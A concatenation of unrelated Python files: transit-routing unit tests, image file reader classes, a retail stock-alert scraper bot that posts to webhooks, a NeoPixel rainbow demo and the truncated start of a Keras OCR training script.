Connection(0, 1, 30, 40, "trip_1", 1),
Connection(3, 4, 45, 50, "trip_2", 1),
Connection(4, 3, 45, 50, "trip_3", 1),
Connection(5, 3, 45, 50, "trip_4", 1),
Connection(1, target_stop, 70, 100, "trip_5", 1)
]
walk_network = networkx.Graph()
walk_network.add_edge(1, 3, d_walk=1)
walk_network.add_edge(1, 4, d_walk=1)
walk_network.add_edge(1, 5, d_walk=1)
csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profiler.run()
profiles = csa_profiler.stop_profiles
assert(profiles[0].get_final_optimal_labels()[0])
assert(len(profiles[0].get_final_optimal_labels()) > 0)
def test_transfer_connections_do_not_affect_transfers2(self):
walk_speed = 1
target_stop = 0
start_time = 0
end_time = 60
transfer_margin = 0
transit_connections = [
Connection(3, 0, 10, 11, "trip_1", 1),
Connection(2, 1, 5, 6, "trip_2", 1),
Connection(4, 3, 0, 1, "trip_3", 1)
]
walk_network = networkx.Graph()
walk_network.add_edge(2, 3, d_walk=1)
walk_network.add_edge(1, 0, d_walk=1)
csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profiler.run()
profiles = csa_profiler.stop_profiles
assert(len(profiles[4].get_final_optimal_labels()) == 1)
optimal_label = profiles[4].get_final_optimal_labels()[0]
self.assertEqual(optimal_label.departure_time, 0)
self.assertEqual(optimal_label.arrival_time_target, 7)
self.assertEqual(optimal_label.n_boardings, 2)
def test_transfer_connections_do_not_affect_transfers3(self):
walk_speed = 1
target_stop = 0
start_time = 0
end_time = 60
transfer_margin = 0
transit_connections = [
Connection(3, 0, 10, 11, "t1", 1),
Connection(2, 1, 5, 6, "t2", 1),
Connection(7, 2, 3, 4, "tX", 1),
Connection(5, 6, 2, 3, "--", 1),
Connection(4, 3, 0, 1, "t3", 1)
]
walk_network = networkx.Graph()
walk_network.add_edge(7, 3, d_walk=1)
walk_network.add_edge(1, 0, d_walk=1)
walk_network.add_edge(5, 3, d_walk=1)
csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profiler.run()
profiles = csa_profiler.stop_profiles
print(profiles[4].get_final_optimal_labels()[0])
optimal_labels = profiles[4].get_final_optimal_labels()
assert(len(optimal_labels) == 2)
boardings_to_arr_time = {}
for label in optimal_labels:
boardings_to_arr_time[label.n_boardings] = label.arrival_time_target
self.assertEqual(boardings_to_arr_time[2], 11)
self.assertEqual(boardings_to_arr_time[3], 7)
def _assert_label_sets_equal(self, found_tuples, should_be_tuples):
self.assertEqual(len(found_tuples), len(should_be_tuples))
for found_tuple in found_tuples:
self.assertIn(found_tuple, should_be_tuples)
for should_be_tuple in should_be_tuples:
self.assertIn(should_be_tuple, found_tuples)
def test_stored_route(self):
# TODO:
# - test with multiple targets
# - test with continuing route
# - test that timestamps for label and the connection objects match
csa_profile = MultiObjectivePseudoCSAProfiler(self.transit_connections, self.target_stop,
self.start_time, self.end_time, self.transfer_margin,
self.walk_network, self.walk_speed, track_route=True)
csa_profile.run()
for stop, profile in csa_profile.stop_profiles.items():
for bag in profile._label_bags:
for label in bag:
# print(stop, label)
cur_label = label
journey_legs = []
while True:
connection = cur_label.connection
if isinstance(connection, Connection):
journey_legs.append(connection)
if not cur_label.previous_label:
break
cur_label = cur_label.previous_label
route_tuples_list = [(x.departure_stop, x.arrival_stop) for x in journey_legs]
# print(route_tuples_list)
# test that all legs are unique
self.assertEqual(len(route_tuples_list), len(set(route_tuples_list)))
prev_arr_node = None
for route_tuple in route_tuples_list:
dep_node = route_tuple[0]
arr_node = route_tuple[1]
# test that all legs have unique departure and arrival nodes
self.assertNotEqual(dep_node, arr_node)
if prev_arr_node:
# test that legs form an continuous path
self.assertEqual(prev_arr_node, dep_node)
prev_arr_node = arr_node
def test_target_self_loops(self):
event_list_raw_data = [
(3, 1, 30, 40, "trip_3", 1)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(1, 3, d_walk=11)
walk_speed = 1
target_stop = 1
transfer_margin = 0
start_time = 0
end_time = 50
print(walk_network.edges())
print(transit_connections)
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed, track_vehicle_legs=True,
track_time=True, track_route=True)
csa_profile.run()
for stop, profile in csa_profile.stop_profiles.items():
if stop == target_stop:
self.assertEqual(len(profile.get_final_optimal_labels()), 0)
def test_journeys_using_movement_duration(self):
def unpack_route_from_labels(cur_label):
route = []
last_arrival_stop = None
while True:
connection = cur_label.connection
if isinstance(connection, Connection):
route.append(connection.departure_stop)
if not cur_label.previous_label:
break
cur_label = cur_label.previous_label
if isinstance(connection, Connection):
last_arrival_stop = connection.arrival_stop
route.append(last_arrival_stop)
return route
event_list_raw_data = [
(1, 2, 0, 10, "trip_1", 1),
(2, 3, 10, 20, "trip_1", 1),
(4, 5, 30, 40, "trip_2", 1),
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(2, 4, d_walk=10)
walk_network.add_edge(3, 4, d_walk=10)
walk_speed = 1
target_stop = 5
transfer_margin = 0
start_time = 0
end_time = 50
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed, track_vehicle_legs=False,
track_time=True, track_route=True)
csa_profile.run()
for stop, profile in csa_profile.stop_profiles.items():
for label_bag in profile._label_bags:
for label in label_bag:
print('origin:', stop, 'n_boardings/movement_duration:', label.movement_duration, 'route:', unpack_route_from_labels(label))
print('optimal labels:')
for stop, profile in csa_profile.stop_profiles.items():
for label in profile.get_final_optimal_labels():
print('origin:', stop, 'n_boardings/movement_duration:', label.movement_duration, 'route:', unpack_route_from_labels(label))
#if stop == 1:
#assert 3 not in unpack_route_from_labels(label)
# print('origin:', stop, 'n_boardings:', label.n_boardings, 'route:', unpack_route_from_labels(label))
def test_journeys_using_movement_duration_last_stop_walk(self):
def unpack_route_from_labels(cur_label):
route = []
last_arrival_stop = None
print(cur_label)
while True:
print(cur_label.previous_label)
connection = cur_label.connection
if isinstance(connection, Connection):
route.append(connection.departure_stop)
if not cur_label.previous_label:
break
cur_label = cur_label.previous_label
if isinstance(connection, Connection):
last_arrival_stop = connection.arrival_stop
route.append(last_arrival_stop)
return route
event_list_raw_data = [
(1, 2, 0, 10, "trip_1", 1),
(2, 3, 10, 20, "trip_2", 1),
(4, 5, 30, 40, "trip_3", 1),
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(2, 4, d_walk=10)
walk_network.add_edge(3, 4, d_walk=10)
walk_network.add_edge(5, 6, d_walk=10)
walk_speed = 1
target_stop = 5
transfer_margin = 0
start_time = 0
end_time = 50
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed, track_vehicle_legs=False,
track_time=True, track_route=True)
csa_profile.run()
for stop, profile in csa_profile.stop_profiles.items():
for label_bag in profile._label_bags:
for label in label_bag:
print('origin:', stop,
'n_boardings/movement_duration:', label.movement_duration,
'route:', unpack_route_from_labels(label))
print('optimal labels:')
for stop, profile in csa_profile.stop_profiles.items():
for label in profile.get_final_optimal_labels():
print('origin:', stop,
'n_boardings/movement_duration:', label.movement_duration,
'route:', unpack_route_from_labels(label))
#if stop == 1:
#assert 3 not in unpack_route_from_labels(label)
# print('origin:', stop, 'n_boardings:', label.n_boardings, 'route:', unpack_route_from_labels(label))
def test_zero_length_journeys_potential_bug_1(self):
event_list_raw_data = [
(0, 1, 0, 0, "trip_1", 0),
(1, 2, 0, 0, "trip_1", 1)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(10, 1, d_walk=20)
walk_network.add_edge(1, 11, d_walk=20)
walk_speed = 1
target_stop = 11
transfer_margin = 0
start_time = 0
end_time = 50
csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed,
track_vehicle_legs=True,
track_time=True,
track_route=True)
csa_profiler.run()
stop_profile_1 = csa_profiler._stop_profiles[1]
all_labels_stop_profile_1 = [label for label_bag in stop_profile_1._label_bags for label in label_bag]
for label in all_labels_stop_profile_1:
self.assertLess(label.n_boardings, 1, "There should at most a walking label when going from 11 to 1 at any "
"point in time, now one label has " + str(label.n_boardings) +
" boardings"
)
def test_zero_length_journeys_potential_bug(self):
s = 0
a = 1
b = 2
t = 3
event_list_raw_data = [
(s, a, 0, 0, "trip_1", 1),
(a, b, 0, 0, "trip_1", 2),
(b, t, 1, 2, "trip_2", 0)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_speed = 1
target_stop = t
transfer_margin = 0
start_time = 0
end_time = 50
csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed,
track_vehicle_legs=True,
track_time=True,
track_route=True)
csa_profiler.run()
stop_profile_a_labels = csa_profiler.stop_profiles[a].get_final_optimal_labels()
stop_profile_s_labels = csa_profiler.stop_profiles[s].get_final_optimal_labels()
self.assertEqual(len(stop_profile_a_labels), 1)
self.assertEqual(len(stop_profile_s_labels), 1)
|
import HAWC2_TCP
def test_something():
assert 4 == 4
|
# coding=utf-8
"""Write multidimensional data line by line"""
from abc import ABCMeta, abstractmethod
from copy import deepcopy
import itertools
import numpy as np
from imagesplit.utils.utilities import to_rgb
from imagesplit.image.image_wrapper import ImageWrapper, ImageStorage
from imagesplit.utils.utilities import rescale_image
# pylint:disable=unnecessary-pass
class ImageFileReader(object):
"""Base class for writing data from source to destination"""
__metaclass__ = ABCMeta
@abstractmethod
def write_image(self, data_source, rescale_limits):
"""Create and write out this file, using data from this image source"""
pass
class LinearImageFileReader(ImageFileReader):
"""Base class for writing data from source to destination line by line"""
def __init__(self, image_size):
self.size = image_size
@abstractmethod
def write_line(self, start, image_line, rescale_limits):
"""Write the next line of bytes to the file"""
@abstractmethod
def read_line(self, start, num_voxels):
"""Reads a line of bytes from the file"""
pass
@abstractmethod
def close_file(self):
"""Close the file"""
pass
def read_image(self, start_local, size_local):
"""Read the specified part of the image"""
# Compute coordinate ranges
ranges = [range(st, st + sz) for st, sz in
zip(start_local, size_local)]
# Exclude first coordinate and get others in reverse order
ranges_to_iterate = ranges[:0:-1]
# Initialise the output array only when we know the data tyoe
combined_image = ImageWrapper(origin=start_local,
image_size=size_local)
# Iterate over each line (equivalent to multiple for loops)
for start_points in itertools.product(*ranges_to_iterate):
start = [start_local[0]] + list(reversed(start_points))
size = np.ones_like(size_local)
size[0] = size_local[0]
# Read one image line from the file
image_line = self.read_line(start, size[0])
sub_image = ImageWrapper(
origin=start,
image=ImageStorage(image_line).reshape(size))
combined_image.set_sub_image(sub_image)
return combined_image.image
def write_image(self, data_source, rescale_limits):
"""Create and write out this file, using data from this image source"""
# Compute coordinate ranges
ranges = [range(0, sz) for sz in self.size]
# Exclude first two coordinates and get others in reverse order
ranges_to_iterate = ranges[:1:-1]
# Iterate over each line (equivalent to multiple for loops)
for main_dim_size in itertools.product(*ranges_to_iterate):
start = [0] * min(2, len(self.size)) + \
list(reversed(main_dim_size))
# Size contains the first two dimensions and ones
size = self.size[:2] + [1] * (len(self.size) - 2)
# Read one image slice from the transformed source
image_slice = data_source.read_image(start, size)
# Write out the image data to the file
for line in range(0, size[1] if len(size) > 1 else 1):
out_start = deepcopy(start)
out_size = [self.size[0]] + [1] * (len(self.size) - 1)
if len(start) > 1:
out_start[1] = line
image_line = image_slice.get_sub_image(out_start,
out_size).image
self.write_line(out_start, image_line.get_raw(), rescale_limits)
self.close_file()
class BlockImageFileReader(ImageFileReader):
"""Base class for writing data from source to destination as a 2d block"""
@abstractmethod
def save(self, image):
"""Write the image to the file"""
@abstractmethod
def load(self):
"""Reads an image from the file"""
pass
@abstractmethod
def close_file(self):
"""Close the file"""
pass
def __init__(self, image_size, data_type):
self.size = image_size
self.data_type = data_type
def read_image(self, start_local, size_local):
"""Read the specified part of the image"""
image_data_raw = self.load()
image_data = ImageStorage.from_raw_image(image_data_raw, self.size)
if image_data.get_size() != self.size:
raise ValueError("Image is not the expected size")
image = ImageWrapper(origin=np.zeros_like(start_local),
image=image_data)
return image.get_sub_image(start_local, size_local).image
def write_image(self, data_source, rescale_limits):
"""Create and write out this file, using data from this image source"""
numpy_format = self.data_type.get_numpy_format()
data_type = np.dtype(numpy_format)
image_data = \
data_source.read_image(np.zeros_like(self.size), self.size).image
image_data_raw = image_data.get_raw_image()
if rescale_limits:
image_data_raw = rescale_image(data_type, image_data_raw,
rescale_limits)
else:
image_data_raw = np.around(image_data_raw).astype(data_type)
if self.data_type.get_is_rgb():
image_data_raw = to_rgb(image_data_raw)
else:
if image_data_raw.dtype != data_type:
image_data_raw = np.around(image_data_raw).astype(data_type)
self.save(image_data_raw)
self.close_file()
|
import requests
import time
import json
from datetime import datetime
import urllib.parse as urlparse
from urllib.parse import parse_qs
# import webhook_settings
# import product_settings
from threading import Thread
from selenium import webdriver
from chromedriver_py import binary_path as driver_path
from lxml import html
import os
stockdict = {}
sku_dict = {}
bestbuylist = []
targetlist = []
walmartlist = []
bhlist = []
bbdict = {}
bbimgdict = {}
amazonlist = []
gamestoplist = []
# Function for start-up menu
def menu():
webhook_dict = return_data("./data/webhooks.json")
url_dict = return_data("./data/products.json")
# print("Select an Option: \n 1: Edit Webhooks \n 2: Edit Product URLs \n 3: Run the product tracker \n")
# val = input("Enter # (1-3)")
# if val == "1":
# webhook_settings.main()
# menu()
# elif val == "2":
# product_settings.main()
# menu()
# elif val == "3":
# print("\n \n Starting Product Tracker! \n \n")
# else:
# menu()
def return_data(path):
with open(path, "r") as file:
data = json.load(file)
file.close()
return data
# Prompt the user at startup
menu()
# Only declare the webhook and product lists after the menu has been passed so that changes made from menu selections are up to date
webhook_dict = return_data("./data/webhooks.json")
url_dict = return_data("./data/products.json")
# Declare classes for the webpage scraping functionality
class Amazon:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
options.add_argument("--headless")
options.add_argument("--disable-dev-shm-usage")
options.add_argument("--sandbox")
# Heroku setup
options.binary_location = os.environ.get("GOOGLE_CHROME_BIN")
driver = webdriver.Chrome(executable_path=os.environ.get("CHROMEDRIVER_PATH"), options=options)
# driver = webdriver.Chrome(executable_path=driver_path, options=options)
driver.get(url)
html = driver.page_source
if "To discuss automated access to Amazon data please contact api-services-support@amazon.com." in html:
print("Amazons Bot Protection is preventing this call.")
else:
try:
status_raw = driver.find_element_by_xpath("//div[@id='olpOfferList']")
status_text = status_raw.text
title_raw = driver.find_element_by_xpath("//h1[@class='a-size-large a-spacing-none']")
title_text = title_raw.text
title = title_text
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "Currently, there are no sellers that can deliver this item to your location." not in status_text:
print("[" + current_time + "] " + "In Stock: (Amazon.com) " + title + " - " + url)
# slack_data = {'content': "[" + current_time + "] " + title + " in stock at Amazon - " + url}
img_raw = driver.find_element_by_xpath('//*[@id="olpProductImage"]/a/img')
img =img_raw.get_attribute('src')
slack_data = {
'username': "Amazon Bot",
'avatar_url': "https://github.com/tnware/product-checker/blob/master/img/amazon.png",
'content': "GameStop Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Amazon",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title)
stockdict.update({url: 'False'})
except Exception as e:
print("Error while parsing", e)
finally:
driver.quit()
class Gamestop:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
options.add_argument("--headless")
options.add_argument("--disable-dev-shm-usage")
options.add_argument("--sandbox")
# Heroku setup
options.binary_location = os.environ.get("GOOGLE_CHROME_BIN")
driver = webdriver.Chrome(executable_path=os.environ.get("CHROMEDRIVER_PATH"), options=options)
# driver = webdriver.Chrome(executable_path=driver_path, options=options)
driver.get(url)
# status_raw = driver.find_element_by_xpath("//div[@class='add-to-cart-buttons']")
# status_text = status_raw.text
try:
status_raw = driver.find_elements_by_class_name('add-to-cart-buttons')
status_text = status_raw[0].text
title_raw = driver.find_element_by_xpath("//h1[@class='product-name h2']")
title_text = title_raw.text
title = title_text
# image_raw = driver.find_element_by_xpath("//img[@class='mainImg']")
# image_raw = driver.find_element_by_class_name('product-main-image-gallery')
# img = image_raw.get_attribute('src')
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "ADD TO CART" in status_text:
print("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url)
slack_data = {
'username': "GameStop Bot",
'avatar_url': "https://github.com/tnware/product-checker/blob/master/img/gamestop.png",
'content': "GameStop Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at GameStop",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
# 'thumbnail': {
# 'url': img
# }
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title)
stockdict.update({url: 'False'})
except Exception as e:
print("Error while parsing", e)
finally:
driver.quit()
class Target:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
al = page.text
tree = html.fromstring(page.content)
imgs = tree.xpath("//img[1]")
img_raw = str(imgs[0].attrib)
img = img_raw[20:-2]
title = al[al.find('"twitter":{"title":') + 20 : al.find('","card')]
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "Deliver to" not in page.text:
# print("[" + current_time + "] " + "Sold Out: (Target.com) " + title)
stockdict.update({url: 'False'})
else:
print("[" + current_time + "] " + "In Stock: (Target.com) " + title + " - " + url)
slack_data = {
'username': "Target Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/target.png",
'content': "Target Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Target",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
#print(stockdict)
class BestBuy:
def __init__(self, sku, hook):
self.sku = sku
self.hook = hook
webhook_url = webhook_dict[hook]
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
url = "https://www.bestbuy.com/api/tcfb/model.json?paths=%5B%5B%22shop%22%2C%22scds%22%2C%22v2%22%2C%22page%22%2C%22tenants%22%2C%22bbypres%22%2C%22pages%22%2C%22globalnavigationv5sv%22%2C%22header%22%5D%2C%5B%22shop%22%2C%22buttonstate%22%2C%22v5%22%2C%22item%22%2C%22skus%22%2C" + sku + "%2C%22conditions%22%2C%22NONE%22%2C%22destinationZipCode%22%2C%22%2520%22%2C%22storeId%22%2C%22%2520%22%2C%22context%22%2C%22cyp%22%2C%22addAll%22%2C%22false%22%5D%5D&method=get"
headers2 = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"
}
page = requests.get(url, headers=headers2)
link = "https://www.bestbuy.com/site/" + sku + ".p?skuId=" + sku
al = page.text
search_string = '"skuId":"' + sku + '","buttonState":"'
stock_status = al[al.find(search_string) + 33: al.find('","displayText"')]
product_name = sku_dict.get(sku)
if stock_status == "SOLD_OUT":
# print("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name)
stockdict.update({sku: 'False'})
elif stock_status == "CHECK_STORES":
# print(product_name + " sold out @ BestBuy (check stores status)")
stockdict.update({sku: 'False'})
else:
if stock_status == "ADD_TO_CART":
print("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link)
slack_data = {
'username': "BestBuy Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bestbuy.png",
'content': "BestBuy Stock Alert:",
'embeds': [{
'title': product_name,
'description': product_name + " in stock at BestBuy",
'url': link,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': bbimgdict.get(sku)
}
}]
}
if stockdict.get(sku) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({sku: 'True'})
# print(stockdict)
class Walmart:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
# page = requests.get(url)
# tree = html.fromstring(page.content)
# title_raw = tree.xpath("//h1[@class='prod-ProductTitle font-normal']")
# title = title_raw[0].text
# price_raw = tree.xpath("//span[@class='price display-inline-block arrange-fit price price--stylized']//span[@class='price-characteristic']")
# price = price_raw[0].text
# img_raw = tree.xpath("//meta[@property='og:image']/@content")
# img = img_raw[0]
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument(
'--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
options.add_argument("--headless")
options.add_argument("--disable-dev-shm-usage")
options.add_argument("--sandbox")
# Heroku setup
options.binary_location = os.environ.get("GOOGLE_CHROME_BIN")
driver = webdriver.Chrome(executable_path=os.environ.get("CHROMEDRIVER_PATH"), options=options)
# driver = webdriver.Chrome(executable_path=driver_path, options=options)
driver.get(url)
title = driver.find_element_by_xpath("//h1[@class='prod-ProductTitle prod-productTitle-buyBox font-bold']").text
price = driver.find_element_by_xpath(
"//span[@class='price display-inline-block arrange-fit price price--stylized']//span[@class='price-characteristic']").text
img_raw = driver.find_element_by_xpath("//meta[@property='og:image']")
img = img_raw.get_attribute('content')
try:
driver.find_element_by_xpath(
'//*[@id="add-on-atc-container"]/div[1]/section/div[1]/div[3]/button/span/span')
add_to_cart = True
except:
add_to_cart = False
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if add_to_cart:
print("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url)
slack_data = {
'username': "Walmart Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/walmart.png",
'content': "Walmart Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Walmart for $" + price,
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Price:",
"value": "$" + price
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
try:
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
except:
print("Webhook sending failed. Invalid URL configured.")
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title)
stockdict.update({url: 'False'})
driver.quit()
# TODO test and fix if necessary
class BH:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if page.status_code == 200:
if "Add to Cart" in page.text:
print("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url)
slack_data = {'content': "[" + current_time + "] " + url + " in stock at B&H"}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url)
stockdict.update({url: 'False'})
# classify all the URLs by site
for url in url_dict:
hook = url_dict[url] # get the hook for the url so it can be passed in to the per-site lists being generated below
# Amazon URL Detection
if "amazon.com" in url:
if "offer-listing" in url:
amazonlist.append(url)
print("Amazon detected using Webhook destination " + hook)
else:
print("Invalid Amazon link detected. Please use the Offer Listing page.")
# Target URL Detection
elif "gamestop.com" in url:
gamestoplist.append(url)
print("Gamestop URL detected using Webhook destination " + hook)
# BestBuy URL Detection
elif "bestbuy.com" in url:
print("BestBuy URL detected using Webhook destination " + hook)
parsed = urlparse.urlparse(url)
sku = parse_qs(parsed.query)['skuId']
sku = sku[0]
bestbuylist.append(sku)
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"user-agent": " "
}
page = requests.get(url, headers=headers)
al = page.text
tree = html.fromstring(page.content)
img = tree.xpath('//img[@class="primary-image"]/@src')[0]
title = al[al.find('<title >') + 8 : al.find(' - Best Buy</title>')]
sku_dict.update({sku: title})
bbdict.update({sku: hook})
bbimgdict.update({sku: img})
# Target URL Detection
elif "target.com" in url:
targetlist.append(url)
print("Target URL detected using Webhook destination " + hook)
# Walmart URL Detection
elif "walmart.com" in url:
walmartlist.append(url)
print("Walmart URL detected using Webhook destination " + hook)
# B&H Photo URL Detection
elif "bhphotovideo.com" in url:
bhlist.append(url)
print("B&H URL detected using Webhook destination " + hook)
# set all URLs to be "out of stock" to begin
for url in url_dict:
stockdict.update({url: 'False'})
# set all SKUs to be "out of stock" to begin
for sku in sku_dict:
stockdict.update({sku: 'False'})
# DECLARE SITE FUNCTIONS
def amazon_run(url):
while True:
hook = url_dict[url]
try:
Amazon(url, hook)
except:
print("Some error occurred parsing Amazon: " + url)
time.sleep(10)
def gamestop_run(url):
while True:
hook = url_dict[url]
try:
Gamestop(url, hook)
except:
print("Some error occurred parsing GameStop")
time.sleep(10)
def target_run(url):
while True:
hook = url_dict[url]
try:
Target(url, hook)
except:
print("Some error occurred parsing Target")
time.sleep(10)
def bh_run(url):
while True:
hook = url_dict[url]
try:
BH(url, hook)
except:
print("Some error occurred parsing BH Photo")
time.sleep(10)
def bestbuy_run(sku):
while True:
hook = bbdict[sku]
try:
BestBuy(sku, hook)
except:
print("Some error occurred parsing Best Buy")
time.sleep(10)
def walmart_run(url):
while True:
hook = url_dict[url]
try:
Walmart(url, hook)
except:
print("Some error occurred parsing WalMart")
time.sleep(10)
# MAIN EXECUTION
for url in amazonlist:
t = Thread(target=amazon_run, args=(url,))
t.start()
time.sleep(0.5)
for url in gamestoplist:
t = Thread(target=gamestop_run, args=(url,))
t.start()
time.sleep(0.5)
for url in targetlist:
t = Thread(target=target_run, args=(url,))
t.start()
time.sleep(0.5)
for url in bhlist:
t = Thread(target=bh_run, args=(url,))
t.start()
time.sleep(0.5)
for sku in bestbuylist:
t = Thread(target=bestbuy_run, args=(sku,))
t.start()
time.sleep(0.5)
for url in walmartlist:
t = Thread(target=walmart_run, args=(url,))
t.start()
time.sleep(0.5)
|
import time
import board
import neopixel
pixels = neopixel.NeoPixel(board.NEOPIXEL, 10, brightness=0.2, auto_write=False)
rainbow_cycle_demo = 1
def colorwheel(pos):
if pos < 0 or pos > 255:
return (0, 0, 0)
if pos < 85:
return (255 - pos * 3, pos * 3, 0)
if pos < 170:
pos -= 85
return (0, 255 - pos * 3, pos * 3)
pos -= 170
return (pos * 3, 0, 255 - pos * 3)
def rainbow_cycle(wait):
for j in range(255):
for i in range(10):
rc_index = (i * 256 // 10) + j * 5
pixels[i] = colorwheel(rc_index & 255)
pixels.show()
time.sleep(wait)
while True:
if rainbow_cycle_demo:
rainbow_cycle(0.05)
|
'''
@Author: zm
@Date and Time: 2019/8/8 15:14
@File: train.py
'''
import math
import numpy as np
import tensorflow as tf
from keras import backend as K
from keras.layers import Input
from keras import Model
from keras.optimizers import Adam
from keras.callbacks import Callback
from Loss import Loss
from Dataset import Dataset
from generator import generator
from get_dataset import get_dataset
from ImageTf import ImageTf
from ToOneHot import ToOneHot
from ocr_model import OCR_Model
seq_len = 4
class CrossEntropy(Loss):
def compute_loss(self, inputs, seq_len=seq_len):
y_true, y_pred = inputs
